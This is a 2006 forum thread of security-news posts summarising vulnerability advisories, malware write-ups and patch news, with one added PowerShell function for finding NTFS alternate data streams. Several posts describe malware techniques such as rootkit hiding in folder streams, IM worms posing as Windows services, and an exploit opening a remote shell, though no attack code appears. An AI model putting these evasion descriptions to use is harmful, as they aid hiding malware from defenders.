http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx
http://secunia.com/advisories/20686/
http://www.frsirt.com/english/advisories/2006/2361
Mdropper.J – Links related to New Trojan Horse
http://www.frsirt.com/english/virus/2006/04533
http://www.symantec.com/avcenter/venc/data/trojan.mdropper.j.html
QUOTE: Here’s what we know: In order for this attack to be carried out, a user must first open a malicious Excel document that is sent as an email attachment or otherwise provided to them by an attacker. (note that opening it out of email will prompt you to be careful about opening the attachment) So remember to be very careful opening unsolicited attachments from both known and unknown sources.
Technical Description: A vulnerability has been identified in Microsoft Excel, which could be exploited by attackers to take complete control of an affected system. This flaw is due to an unspecified error when processing a specially crafted document, which could be exploited by attackers to execute arbitrary commands by convincing a user to open a malicious file.
Affected Products: Microsoft Excel 2000-2003, Office 2000-2003
Zero Day Excel based Exploit: This 0day vulnerability is currently being exploited in the wild by Trojan.Mdropper.J
-
June 16, 2006 at 1:12 pm #3268574
Windows XP SP1 support ends on October 10, 2006
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
After October 2006, Microsoft will no longer provide security updates for XP SP1. Users should move to Service Pack 2 to continue enjoying the best possible levels of security protection.
Windows XP SP1 support ends on October 10, 2006
http://support.microsoft.com/gp/lifean19
Windows and SP EOL Links
http://www.microsoft.com/windows/lifecycle/default.mspx
http://www.microsoft.com/windows/lifecycle/servicepacks.mspx
-
June 16, 2006 at 1:12 pm #3268575
Windows Malicious Software Removal Tool — Removing a lot of malware
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Over a year ago, Microsoft introduced a valuable service to home users and others who may be less protected than corporate users. During each “Patch Tuesday” release this tool is updated to clean some of the most prominent threats impacting Windows.
Windows Malicious Software Removal Tool — Removing a lot of malware
QUOTE: The MSRT has removed 16 million instances of malicious software from 5.7 million unique Windows computers over the past 15 months. On average, the tool removes at least one instance of malware from every 311 computers it runs on.
-
June 16, 2006 at 1:12 pm #3268576
TechNet – Excellent User Security Awareness Article
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Dr. Jesper Johansson’s article in the July 2006 edition of TechNet Magazine is EXCELLENT in highlighting the importance of security education for users as part of the “process”.
Article: Help Wanted: Need “People” People
QUOTE: Empower People — I firmly believe that writing off people is wrong. People are incredibly smart when you get right down to it. They have learned some extremely complicated things, like walking, talking, reading, even driving cars without crashing into things all that often. There is no reason to believe they could not be taught to make more intelligent security decisions. I am not saying they should become security experts; only that they need to learn that sending a blank, signed check to an unknown recipient is probably not a good idea.
-
June 19, 2006 at 7:21 am #3270567
Securiteam Blogs — FAQ on Excel 0 Day Vulnerability
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This FAQ provides a good summary related to the new 0-day vulnerability which is being exploited in spam email. Avoid all untrusted Excel spreadsheets found in email messages and keep your anti-virus software up-to-date until Microsoft has a security patch to address this new issue. So far, this new threat is not prevalent in the wild.
Securiteam Blogs — FAQ on Excel 0 Day Vulnerability
http://blogs.securiteam.com/index.php/archives/451
Good Security Resource to Bookmark
http://www.securiteam.com/
-
June 19, 2006 at 7:21 am #3270565
Windows XP Service Pack 2 can now be ordered on CD
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Windows XP SP1 will no longer be supported by Microsoft after October 10, 2006. It is important to move to Service Pack 2 which can be downloaded from Microsoft’s web site. Dial up users can obtain the CD by ordering it from Microsoft. While the CD is free, there is a shipping & handling charge.
IT Professionals should help get their friends and family who may not be aware of this issue to this more secure version of Windows.
Order Windows XP Service Pack 2 on CD
QUOTE: Thank you for your interest in the Windows XP Service Pack 2 CD. This CD includes the same Service Pack 2 software that is available for download from Microsoft Update.
Note: A shipping and handling charge will be assessed on your order.
Share This CD with a Friend — After you have installed Service Pack 2, Microsoft encourages you to give this CD to a friend or family member using Windows XP.
-
June 19, 2006 at 7:21 am #3270566
MS06-025 Security Patch – May impact dial up scripting
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
So far, results have been good for the large number of security updates. MS06-025 may impact some users who are using older connectivity software as noted in the links below.
MS06-025 Security Patch – May impact dial up scripting
http://www.incidents.org/diary.php?storyid=1423
http://blogs.technet.com/msrc/archive/2006/06/17/436882.aspx
http://support.microsoft.com/kb/911280
QUOTE: So far there’ve been no issues with a vast majority of the updates, but one issue we are tracking has to do with MS06-025, very specifically related to dial-up users that use dial-up scripting, a very old piece of functionality not widely in use anymore. (Users using dial-up for Internet or Remote Access Services who do not use dial-up scripting or terminal windows are unaffected.)
-
June 20, 2006 at 7:20 am #3269716
Sixem email virus – World Cup Soccer theme
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
It’s important to avoid all suspicious email messages, as a new virus has appeared that uses the World Cup Soccer tournament as a social engineering approach.
Sixem email virus – World Cup Soccer theme
http://secunia.com/virus_information/30033/sixem.a
W32.Sixem.A@mm is a mass-mailing worm that sends email messages regarding the World Cup.
-
June 20, 2006 at 7:20 am #3269717
MSIL.Kolilo – New Microsoft .NET framework virus
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This new virus is not widespread in the wild and all .NET users should stay up-to-date on virus protection.
http://secunia.com/virus_information/30015/msil.kolilo/
MSIL.Kolilo is a polymorphic virus that infects .exe files under the Microsoft .NET Framework. This virus only executes on systems where Microsoft .NET framework is installed. The said installation is a component of the Windows operating system used to manage and provide pre-coded requirements to programs made specifically for the Windows platform.
-
June 20, 2006 at 3:18 pm #3144011
Bagle-KL: Uses People’s Names in Subject and ZIP attachments
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This new variant is spreading and I’ve received copies in my personal email. Avoid all ZIP attachments unless you are certain they are safe.
Bagle-KL: Uses People’s Names in Subject and ZIP attachments
http://vil.nai.com/vil/content/v_139997.htm
http://secunia.com/virus_information/30068/bagle.fb/
http://secunia.com/virus_information/30087/bagle.fn/
http://secunia.com/virus_information/30073/bagle-km/
This new variant has the following characteristics:
* contains its own SMTP engine to construct outgoing messages
* harvests email addresses from the victim machine
* the From: address of messages is spoofed
* attachment is a password-protected zip file
* password for Zip Archive included with message
* disables security protection
* drops a rootkit
-
June 20, 2006 at 7:18 pm #3143950
Second Excel vulnerability emerges today
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
A new vulnerability has surfaced with a proof-of-concept exploit. So far, there are no documented reports of this being exploited in-the-wild. Users should remain cautious with an untrusted email attachment, just in case this is spammed by email later. Microsoft is working on patches for Excel as noted in their blog entries.
Microsoft Information
http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Microsoft Office Long Link Buffer Overflow Vulnerability
http://secunia.com/advisories/20748/
http://www.frsirt.com/english/advisories/2006/2431
QUOTE: The vulnerability is caused due to a boundary error in hlink.dll within the handling of Hyperlinks in e.g. Excel documents. This can be exploited to cause a stack-based buffer overflow by tricking a user into clicking a specially crafted Hyperlink in a malicious Excel document. The vulnerability has been confirmed in Microsoft Excel 2003 SP2 (fully updated). Other versions and Office products may also be affected.
-
June 20, 2006 at 11:18 pm #3143903
Opera 9 – New Release features security improvements
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
http://www.opera.com/index.dml
http://www.opera.com/pressreleases/en/2006/06/20/
http://www.opera.com/download/
QUOTE: Opera Software today released Opera 9, its newest Web browser for PCs. You can download it free in more than 25 languages for Windows, Mac, Linux and other platforms from http://www.opera.com. Opera 9 enhances the way you access, share and use online content by including innovative widgets – fun, small and useful Web programs – and support for BitTorrent™, the popular file distribution technology. Even while adding these improvements, Opera 9 maintains the security and speed millions of Opera fans have come to expect.
Secure browsing is still the single most important attribute of any Web browser. Opera has a long track record of keeping you safe while online. By introducing the security bar to prevent scams like phishing and strengthening Opera 9’s pop-up blocker to weed out annoying or potentially malicious pop-ups, Opera gives you new options for safe browsing.
-
June 21, 2006 at 3:19 pm #3142119
Opera 9 – New Denial of Service POC vulnerability
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
I’ve been using Opera as one of my complementary browsers for a number of years. While they enjoy a good security track record, a day after the release, a new proof-of-concept vulnerability has surfaced which can trigger a denial of service attack (i.e., this is a minor security risk where the browser might hang for an extraordinary length of time).
Opera 9 – New Denial of Service POC vulnerability
http://www.incidents.org/diary.php?storyid=1436
QUOTE: Well, it didn’t take long. Yesterday, Opera 9 came out, today there is a proof of concept for a long href denial of service exploit. No word on when a patch will be available.
-
June 21, 2006 at 7:29 pm #3269116
Rootserv – uses Kernel Mode Root Kit Techniques
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
There’s been a rash of new Bagles launched lately and one key variant can download a more potent root kit on the infected PC if the website is operational. F-Secure is reporting one new variant per day, so have the cream cheese ready …
New Bagle Variants
http://www.f-secure.com/weblog/archives/archive-062006.html#00000905
http://www.sophos.com/pressoffice/news/articles/2006/06/baglekl.html
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FBAGLE%2EFU
http://securityresponse.symantec.com/avcenter/venc/data/w32.beagle.ff@mm.html
Rootserv – uses Kernel Mode Root Kit Techniques
http://www.sarc.com/avcenter/venc/data/trojan.rootserv.html
Trojan.Rootserv is a Trojan horse that uses kernel mode root kit technology to hide processes, files and registry entries. It also ends and prevents from running various security-related processes.
-
June 22, 2006 at 7:19 am #3268880
Insecure.org publishes Top 100 Network Security and Testing Tools
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Only trained IT professionals testing their own networks should use these tools. nmap, which was purposely excluded, would be on this list as well. Each tool should be carefully assessed before using them in network penetration tests. Still it’s beneficial to test with some of the same tools that are used by the hacker community to ensure technical defenses are in place at all points.
http://www.incidents.org/diary.php?storyid=1438
-
June 22, 2006 at 7:19 am #3268879
Mailbot.AZ – manipulates NTFS ADS and includes kernel mode root kit
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This new threat uses advanced techniques to hide its presence on an infected system.
Mailbot.AZ – manipulates NTFS ADS and includes kernel mode root kit
http://www.f-secure.com/weblog/archives/archive-062006.html#00000907
QUOTE: Many of our readers have probably heard of Alternate Data Streams (ADS) on NTFS. They’re not that well documented and there are only a few tools that can actually handle them. Lately we’ve been looking at variants of the Mailbot family that use hidden streams to hide themselves.
Let’s take Mailbot.AZ (aka Rustock.A) as an example. There’s only a single component lying on the disk, and that is a kernel-mode driver. It’s stored as hidden data stream attached to the system32 folder (yes, folders can have data streams as well)! Saving your data into Alternate Data Streams is usually enough to hide from many tools. However, in this case, the stream is further hidden using rootkit techniques, which makes detection and removal quite challenging. Because Mailbot.AZ is hiding something that’s not readily visible, it’s very likely that many security products will have a tough time dealing with this one.
We’ve just released a new version of our BlackLight rootkit scanner (Build 2.2.1041) that can detect current variants of Mailbot.
Mailbot.AZ is a kernel-mode rootkit that modifies the kernel to hide its presence on the compromised system. It contains an encrypted payload that will be executed in the context of a process named “services.exe”. The payload is a Spamtool with backdoor capabilities.
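Added example, not from the forum post or from F-Secure: a PowerShell check that enumerates alternate data streams on directories as well as files, since the quoted write-up notes that folders can carry streams and that most tools only look at files. It assumes PowerShell 3.0 or later on an NTFS volume; the root path is a placeholder to adjust.

```powershell
# Added example (not from the forum post or F-Secure): enumerate NTFS alternate
# data streams on both directories and files beneath a root path, reporting any
# stream that is not the default unnamed data stream. Requires PowerShell 3.0+
# (the -Stream parameter) on an NTFS volume. Run as an administrator to read
# system folders such as System32. The root path below is a placeholder.
function Find-AlternateDataStream {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [string]$Root,

        # Zone.Identifier is the common, benign "downloaded from the Internet"
        # marker on files; set this switch to include it in the report.
        [switch]$IncludeZoneIdentifier
    )

    # Include the root itself: a clean directory normally exposes no named
    # $DATA streams at all, so any stream attached to a folder deserves a look
    # (Mailbot.AZ, per the write-up above, kept its driver on system32).
    $items = @(Get-Item -LiteralPath $Root -Force -ErrorAction SilentlyContinue) +
             @(Get-ChildItem -LiteralPath $Root -Recurse -Force -ErrorAction SilentlyContinue)

    foreach ($item in $items) {
        # -Force is needed to open hidden/system items; errors (locked files,
        # access denied) are skipped rather than aborting the sweep.
        $streams = Get-Item -LiteralPath $item.FullName -Stream * -Force -ErrorAction SilentlyContinue
        foreach ($s in $streams) {
            # ':$DATA' is the unnamed main stream every regular file has.
            if ($s.Stream -eq ':$DATA') { continue }
            if (-not $IncludeZoneIdentifier -and $s.Stream -eq 'Zone.Identifier') { continue }
            [pscustomobject]@{
                Path        = $item.FullName
                IsDirectory = $item.PSIsContainer
                Stream      = $s.Stream
                Length      = $s.Length
            }
        }
    }
}

# Example invocation against a placeholder root; directories are sorted first
# so a stream hanging off a folder stands out in the listing.
Find-AlternateDataStream -Root 'C:\Windows\System32' |
    Sort-Object -Property IsDirectory -Descending |
    Format-Table -AutoSize
```

As the quoted write-up says, a kernel-mode rootkit that filters directory or stream enumeration can hide a stream from any user-mode tool, this one included, so an empty result is not proof that a system is clean.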
-
June 23, 2006 at 7:35 am #3269281
MS06-025 & Excel HLINK Exploits released to public
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
FrSIRT noted developments for MS06-025 and revised their status from “Green” to “Yellow” overnight. The MS06-025 exploit impacts W/2000 users but not XP SP2 users. Hopefully, there won’t be in-the-wild attacks as they are anticipating with the exploit code publicly released.
Everyone should be on the latest security patches and continue to avoid untrusted Excel documents until Microsoft patches these vulnerabilities.
Microsoft Windows Exploits Out – FrSIRT CTL Raised to Level 2
http://www.frsirt.com/english/threats/
Microsoft Windows Routing and Remote Access Code Execution Issues (MS06-025)
http://www.frsirt.com/english/advisories/2006/2323
Quote: Two remote code execution exploits that take advantage of vulnerabilities affecting Windows have been publicly released.
The first code targets a critical Windows Remote Access Connection Manager vulnerability (MS06-025) addressed last week. Microsoft Windows 2000 systems are primarily at risk from this exploit.
The second code exploits the recently disclosed Windows / Excel memory corruption (0day) and opens a command shell on port 4444 when a specially crafted link is clicked.
FrSIRT Current Threat Level has been raised to ELEVATED (Level 2/4) … We should expect to see active exploitation of these vulnerabilities in the wild within a few hours. Published : 2006.06.22 – 11:12:55 UTC
-
June 26, 2006 at 8:33 am #3163867
Unpatched Excel Vulnerabilities – Latest news
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The ISC has a good summary today of in-the-wild and POC exploits associated with the 3 areas of risk. These are not prevalent in the wild and staying up-to-date on AV protection will help. Most importantly, avoid all untrusted documents or URLs in email.
http://www.incidents.org/diary.php?storyid=1444
QUOTE: To help clearly identify the issues, exploit code and remedy related to the recently announced Excel vulnerabilities, I offer this humble correlation. This information comes from Microsoft, Mitre, and vigilant readers sending in tips. My thanks go to all.
CVE-2006-3059 aka “Excel Repair Mode”
http://www.microsoft.com/technet/security/advisory/921365.mspx
Exploited by: Mdropper.G, Booli.A, Flux.E, Booli.B
CVE-2006-3086 aka “Long Hyperlink”
http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Exploited by: Urxcel.A, and three known public exploit code examples
CVE-2006-3014 aka “Shockwave vulnerability”
Exploited by proof of concept code Flemex.A … The workaround is a killbit
-
June 27, 2006 at 4:37 pm #3110927
Sarbanes-Oxley – General Recommendations on how to achieve SOX compliancy
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Below is an updated list of recommendations, shared in the Sarbanes-Oxley forums … To me, the cornerstones for success include: Planning, Training, and Commitment … Wishing all those companies who must adapt these standards the utmost success.
SOME GENERAL RECOMMENDATIONS FOR SOX IMPLEMENTATION
1. Set up a Project Plan for meeting SOX compliancy requirements (Research and explore what is needed prior to doing anything). Good planning will pay dividends for establishing this process.
2. Get training right away. The core team and especially the leader of the process should invest a week or so in training. Consider attending a formal seminar away from work where you can focus and interact with other participants. This will create a good foundation for what’s required.
3. Perform an inventory of all your IT applications. Identify all of your financial systems and look for any indirect relationships.
4. In conjunction with the inventory, examine the workflow and human factors surrounding financial processing.
5. After the inventory, perform a Risk Management study on all your financial applications (looking at possibilities that someone could either accidentally or deliberately alter financial records).
6. Look at ways of strengthening the Financial process and implement new controls (e.g., versioning, change management, and security)
7. Evaluate random sampling controls and requirements for your financial applications to setup a testing/sampling program on controls each quarter or month, depending on the needs.
8. Evaluate the SOX 404 standards for best practices associated with IT control improvements. Set up a plan to implement and improve standards. Evaluate the COBIT 4.0 standards for IT controls over financial applications (note that COBIT 3.0 is the minimal acceptance level)
9. Work closely with both internal and external auditors and gain their approvals for the work that will be done.
10. Setup an e-Library (electronic documentation library) to include all your SOX documents, test plans, communications, etc.
11. Make sure you obtain senior management support for the process. It is an important aspect for implementing change. They must also support the additional work, human resources, and costs that will be needed to gain compliancy.
12. After the initial process is implemented, continue to improve the SOX controls and keep up-to-date with changes in business and legal requirements.
-
June 28, 2006 at 7:07 am #3110713
New Internet Explorer unpatched OuterHTML and HTA vulnerabilities
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
These are rated as a “moderate risk” and proof-of-concept exploits have been developed.
New IE unpatched OuterHTML and HTA vulnerabilities
http://secunia.com/advisories/20825/
http://www.incidents.org/diary.php?storyid=1448
http://www.frsirt.com/english/advisories/2006/2553
1) An error in the handling of redirections can be exploited to access documents served from another web site via the “object.documentElement.outerHTML” property.
2) An error in the handling of file shares can be exploited to trick a user into executing a malicious HTA application via directory traversal attacks in the filename. Successful exploitation requires some user interaction.
The vulnerabilities have been confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2. Other versions may also be affected.
Solution:
1) Disable Active Scripting support.
2) Filter Windows file sharing traffic.
ISC Testing Note: Regarding the second vulnerability, what’s interesting is that we were able to reproduce this even when using Mozilla FireFox.
-
June 28, 2006 at 3:37 pm #3111787
Kukudro-A – MS Word attack spammed in email
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Sophos has declared MEDIUM RISK (3 out of 5 rating) for this new spammed email attack, although other AV vendors have this at low risk currently.
Kukudro-A – MS Word attack spammed in email
http://secunia.com/virus_information/30331/
http://www.sophos.com/security/analyses/wm97kukudroa.html
http://secunia.com/virus_information/30366/w97mkukudro/
http://www.sarc.com/avcenter/venc/data/w97m.kukudro.a.html
Example of spammed message
http://www.sophos.com/images/common/misc/kukudrdoc.gif
SUMMARY: W97M/Kukudro is a macro trojan that arrives as a Zip file attachment, containing a Word document — which drops and executes a Downloader trojan on the victim’s computer. Sophos has seen the Trojan horse spammed out in email messages with the following Subjects: “worth to see”, “prices”, “Hi”, or “Hello”. It uses a very old vulnerability in Microsoft Word MS01-034 where the malicious code can be automatically run just by viewing the document that contains it (impacting mostly unpatched Office 2000 users).
RECOMMENDATION: Stay up-to-date on AV protection and avoid all spam or untrusted URLs/attachments in your email.
-
June 30, 2006 at 1:15 pm #3112927
Stolen Laptop with info on 26 million Veterans recovered
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
According to media reports, the laptop was stolen from the home, sold for $100, and had not been booted up beyond the password prompt (as it was password protected under XP or 2000). Thankfully, this appears to be more of a random burglary than someone looking to conduct identity theft on a massive scale.
Still, when we put on our security hats, we know that much more could be possible. Let’s hope for a good outcome on this.
Stolen Laptop with info on 26 million Veterans recovered
http://www.gcn.com/online/vol1_no1/41204-1.html
QUOTE: The Veterans Affairs Department said today that law enforcement officials had recovered the stolen laptop containing the personal data of more than 26 million veterans, and that initially it looks as though the data has not been accessed.
The FBI said in a statement that a preliminary review of the equipment by the computer forensics team has determined that the database remains intact and has not been accessed since the laptop was stolen.
-
June 30, 2006 at 2:42 pm #3112889
New Open Office Vulnerabilities – Security release v2.0.3 available
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
It’s important to stay up-to-date on all software products. New vulnerabilities were recently discovered for Open Office 2.0 and all users should move to the latest release.
New Open Office Vulnerabilities – Security release v2.0.3 available
http://www.incidents.org/diary.php?storyid=1454
http://www.openoffice.org/security/bulletin-20060629.html
Security Bulletin 2006-06-29 — OpenOffice.org 2.0.3 fixes three security vulnerabilities that have been found through internal security audits. Although there are currently no known exploits, we urge all users of 2.0.x prior to 2.0.2 to upgrade to the new version or install their vendor’s patches accordingly. Patches for users of OpenOffice.org 1.1.5 will be available shortly.
-
June 30, 2006 at 2:42 pm #3112888
OSX.Leap.A – New Mac OSX Trojan Horse
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
OSX.Leap.A is a new trojan horse that targets the Macintosh OS X and spreads via iChat Instant Messenger program.
OSX.Leap.A – New Mac OSX Trojan Horse
http://secunia.com/virus_information/27059/osxleap-a/
http://secunia.com/virus_information/30445/osx.exploit.launchd/
http://www.sarc.com/avcenter/venc/data/osx.exploit.launchd.html
http://www.theregister.co.uk/2006/02/16/mac_os-x_virus/
OSX.Exploit.Launchd is a Trojan horse that exploits the Apple Mac OS X LaunchD Local Format String Vulnerability (as described in Security Focus BID 18724). It provides root access on the Macintosh OSX version 10.4.6 or earlier.
-
June 30, 2006 at 4:33 pm #3112852
Cuebot-K IM Worm – Hides as a Windows Genuine Advantage Service
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Users should always be careful to avoid processing files or URLs in the Instant Messaging environment. This new IM threat disguises itself like the new WGA process Microsoft is using to ensure the Windows OS has the proper license control keys.
Cuebot-K IM Worm – Hides as a Windows Genuine Advantage (WGA) Service
http://secunia.com/virus_information/30450/cuebot-k/
http://www.sophos.com/security/analyses/w32cuebotk.html
W32/Cuebot-K is an instant messaging worm and backdoor for the Windows platform. W32/Cuebot-K spreads via AOL Instant Messenger. The file wgavn.exe is registered as a new system driver service named “wgavn”, with a display name of “Windows Genuine Advantage Validation Notification” and a startup type of automatic, so that it is started automatically during system startup.
-
July 1, 2006 at 8:32 am #3111318
BKDR_IRCBOT.DB – Trend info for new WGA disguised malware
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Trend provides an excellent write-up and also offers AV protection for this new attack approach.
BKDR_IRCBOT.DB – Trend info for new WGA disguised malware
http://secunia.com/virus_information/30453/bkdrircbot.db/
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR%5FIRCBOT%2EDB&VSect=T
Technical Diagram of Infection Techniques
http://www.trendmicro.com/vinfo/images/BKDR_IRCBOT_DB_img2.gif
QUOTE: It modifies the registry so that, when executed, it displays a name in the Windows Task Manager that sounds similar to a legitimate application. By doing the said action, it tricks users into thinking that it is a legitimate process. It also modifies the registry to disable several system services. The said routine leaves users more vulnerable to attacks. Using a random port, this backdoor connects to a random Internet Relay Chat (IRC) server, then joins a random IRC channel. Once connected, it performs certain commands on the affected system, thus compromising system security. In addition, it attempts to connect to several URLs. The said action consumes system bandwidth.
-
July 1, 2006 at 8:32 am #3111319
3COM’s Zero Day Initiative Security site – Tracks Zero Day risks
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The first link is a good resource to look at for major new POC or in-the-wild exploit developments. There are differing interpretations of what “zero day” means. This list still represents unpatched software vulnerabilities where test or even harmful code has been developed. Most importantly they don’t publish exploit code and maintain confidentiality on the detailed elements of the risk.
3COM’s Zero Day Initiative Security site – Tracks Zero Day risks
http://www.zerodayinitiative.com/advisories.html
Home Page
http://www.zerodayinitiative.com/
Details about 3Com’s programs
http://www.zerodayinitiative.com/details.html
QUOTE: The Zero Day Initiative (ZDI) is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com later provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
-
July 1, 2006 at 8:32 am #3111320
Apple iTunes Software – Update to latest version for protection
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
All users of Apple iTunes should patch their systems to the latest versions promptly due to critical vulnerabilities which have been patched.
Apple iTunes Software – Update to latest version for protection
http://www.frsirt.com/english/advisories/2006/2601
http://docs.info.apple.com/article.html?artnum=303952
http://www.zerodayinitiative.com/advisories/ZDI-06-020.html
Advisory ID : FrSIRT/ADV-2006-2601
CVE ID : CVE-2006-1467
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-06-29
Technical Description: A vulnerability has been identified in Apple iTunes, which could be exploited by remote attackers to take complete control of an affected system. This flaw is due to an integer overflow error in the AAC file parsing code that does not properly handle a malformed “sample_size_table” value, which could be exploited by remote attackers to crash a vulnerable application or execute arbitrary commands by tricking a user into opening a specially crafted AAC file.
Affected Products: Apple iTunes version 6.0.4 and prior
Solution: Upgrade to Apple iTunes version 6.0.5
http://www.apple.com/itunes/download/
-
July 2, 2006 at 8:31 pm #3111023
Windows WGA – Microsoft shares latest directions
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Microsoft shares updated information on WGA in the blog post below. Most notably they do not plan to turn off copies of Windows that are non-WGA compliant as rumored.
Windows Genuine Advantage – Misperceptions about WGA
http://blogs.msdn.com/wga/archive/2006/06/30/652818.aspx
QUOTE: With all of the recent interest in WGA over the past month, I wanted to take a moment to clarify a few of the misperceptions out there and hopefully bring some clarity about what the program is intended to do. First, I’d like to revisit the announcement that was made earlier this week about the updates to the WGA Notifications program. Starting on Tuesday a new version of WGA Notifications was released. There were two significant changes made based on customer feedback.
1) A daily configuration check, or “phone home” feature as it was reported in some places, existed in the pilot phase in order to determine if the notifications should run or not and how often. This configuration check was removed.
2) We also replaced the End User License Agreement (EULA) with a standard General Availability EULA that more clearly explains the purpose of the software and provides details about WGA Notifications. In addition, for customers who choose not to install the updated package, and wish to remove an installed pre-release version, a Knowledge Base article has been made available.
Second, there is a rumor floating around that Microsoft is planning to use WGA to implement a “kill switch” for PCs that fail validation. Microsoft anti-piracy technologies cannot and will not turn off your computer. In our ongoing fight against piracy, we are constantly finding and closing loopholes pirates use to circumvent established policies.
-
July 4, 2006 at 4:40 am #3168712
Internet Explorer – New HHCtrl and ActiveX DoS vulnerabilities
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
These are brand new vulnerabilities for Internet Explorer and proof-of-concept exploits have been developed.
Microsoft Internet Explorer HTML Help Control “HHCtrl” Memory Corruption Vulnerability
http://www.frsirt.com/english/advisories/2006/2635
Advisory ID : FrSIRT/ADV-2006-2635
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-03
Technical Description: A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by remote attackers to crash a vulnerable browser or potentially take complete control of an affected system. This flaw is due to a memory corruption error in the HTML Help Control “HHCtrl” when processing a specially crafted property, which could be exploited by attackers to cause a denial of service or execute arbitrary commands by convincing a user to visit a specially crafted Web page.
Microsoft Internet Explorer Data Access ActiveX Remote Denial of Service Vulnerability
http://www.frsirt.com/english/advisories/2006/2634
Advisory ID : FrSIRT/ADV-2006-2634
Rated as : Low Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-03
Technical Description: A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to cause a denial of service. This flaw is due to a NULL pointer dereference error in the Microsoft Data Access ActiveX “msado15.dll” object when handling a specially crafted property, which could be exploited by attackers to crash a vulnerable browser by tricking a user into visiting a malicious web page.
There may be further developments, as the ISC documents that one site plans to discover and publish a new browser bug each day during July, according to the blog entry.
Internet Storm Center Commentary – Browser Bug of Month Club
http://www.incidents.org/diary.php?storyid=1459
-
July 4, 2006 at 8:29 am #3168675
W32.Gatt – Uses IDC file extension type
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The use of the IDC file extension type as a means to spread viruses may not be that common and may need to be added to the blocking list if further developments occur.
W32.Gatt – Uses IDC file extension type
http://www.sarc.com/avcenter/venc/data/w32.gatt.html
W32.Gatt is a polymorphic entry point-obscuring infector of .IDC files. .IDC files are scripts for the Interactive Disassembler application. The virus is a proof of concept malware and does nothing but replicate. Whenever an infected IDC file is executed, the virus will create a randomly-named .EXE file in the current directory, and execute that file. This newly created .EXE file will infect all .IDC files in the current directory and all subdirectories.
-
July 6, 2006 at 11:41 am #3166881
TROJ_NANISTYL.A – New Excel POC impacting Japanese/Chinese versions
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This is not an active threat and it illustrates that development and testing of potential MS Office exploits continues.
TROJ_NANISTYL.A – New Excel POC impacting Japanese/Chinese versions
http://secunia.com/virus_information/30540/trojnanistyl.a/
QUOTE: This Trojan is a proof-of-concept exploit that takes advantage of an unknown remote code execution vulnerability, which causes Japanese and Chinese versions of Microsoft Excel 2000 to crash on affected systems. Currently, however, this Trojan sample does not have a shell code. It runs on Windows XP and Server 2003.
-
July 6, 2006 at 3:39 pm #3167825
Microsoft July Updates – Seven security releases planned for Patch Tuesday
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
July will represent another important month for security updates.
Microsoft July Updates – Info for Patch Tuesday
http://www.microsoft.com/technet/security/bulletin/advance.mspx
QUOTE: On 11 July 2006 Microsoft is planning to release:
* Four Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer and the Enterprise Scan Tool. Some of these updates will require a restart.
* Three Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer. These updates may require a restart.
-
July 6, 2006 at 3:39 pm #3167826
